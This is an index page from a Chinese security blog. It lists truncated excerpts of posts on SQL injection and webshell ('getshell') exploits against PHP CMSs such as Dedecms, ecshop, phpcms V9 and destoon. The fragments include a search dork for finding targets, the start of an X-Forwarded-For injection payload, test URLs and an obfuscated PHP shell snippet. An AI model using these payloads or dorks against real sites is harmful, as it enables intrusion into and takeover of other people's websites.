安全博客 - 第 749 | CN-SEC 中文网

漏洞时代

Dedecms 注入漏洞9

[php][/php]测试方法127.0.0.1/dede/plus/guestbook.php?action=save&validate=scuf&msg=1&a...

12月31日309 views评论

阅读全文

phpweb成品网站全版本通杀注入漏洞

关键字：inurl:webmall/detail.php?id 数据表：pwn_base_admin关于拿shell首先登录后台admin.php

12月31日漏洞时代805 views评论

阅读全文

B2BBuilder最近漏洞

1、B2BBuilder头注入后台任意代码执行构造头部测试: [php]x-forwarded-for:' and(select 1 from(select count(*),co...

12月31日漏洞时代333 views评论

阅读全文

漏洞时代

齐博cms最新后台getshell

尼玛，本来集合xss的，可是提交乌云直接给我未通过直接上图算了

12月31日1,085 views评论

阅读全文

漏洞时代

Dedecms 会员中心注入漏洞8(二次注入)

[php][/php]那么soeasy 我们发布一个文章http://127.0.0.1/dede/member/content_list.php?channelid=1 打开这里...

12月31日406 views评论

阅读全文

ecshop后台最新拿shell方法，支持最新2.72版本。通杀最新版本后台低权限

<?php $filen=chr(46).chr(46).chr(47).chr(110).chr(117).chr(108).chr(108).chr(46).chr(11...

12月31日漏洞时代320 views评论

阅读全文

漏洞时代

cmseasy getshell 0day

by zvall 代码如下： celive/index.php 代码： [php] $_SESSION['thislive'] = md5(time()); $_SESSION['...

12月31日639 views评论

阅读全文

phpcms V9 getshell exp

#!usr/bin/php -w <?php error_reporting(E_ERROR); set_time_limit(0); $pass="xxx"; print_r(' +-----...

12月31日漏洞时代492 views评论

阅读全文

SiteEngine 6.0 &7.1 SQL注入漏洞及修复

############################################################################# #标题: SiteE...

12月31日漏洞时代454 views评论

阅读全文

杰奇CMS 1.7商业版注入漏洞

杰奇CMS 1.7商业版用了Zend加密，批量解密后，发现程序员用了几个函数，使得这套系统基本没了注入漏洞。在判断ip时，程序员将.过滤再判断是否是为数字，值得借鉴。 [php] ...

12月31日漏洞时代484 views评论

阅读全文

漏洞时代

Dedecms 会员中心注入漏洞7

[php][/php][php] [/php]

12月31日342 views评论

阅读全文

destoon 全版本SQL注入漏洞

在include/global.func.php 中strip_sql函数对传进来的值进行了过滤，但是我们可以绕过该限制，达到全版本注入 [php]

12月31日漏洞时代842 views评论

阅读全文

Dedecms 注入漏洞9

phpweb成品网站全版本通杀注入漏洞

B2BBuilder最近漏洞

齐博cms最新后台getshell

Dedecms 会员中心注入漏洞8(二次注入)

ecshop后台最新拿shell方法，支持最新2.72版本。通杀最新版本后台低权限

cmseasy getshell 0day

phpcms V9 getshell exp

SiteEngine 6.0 &7.1 SQL注入漏洞及修复

杰奇CMS 1.7商业版注入漏洞

Dedecms 会员中心注入漏洞7

destoon 全版本SQL注入漏洞

在线咨询

微信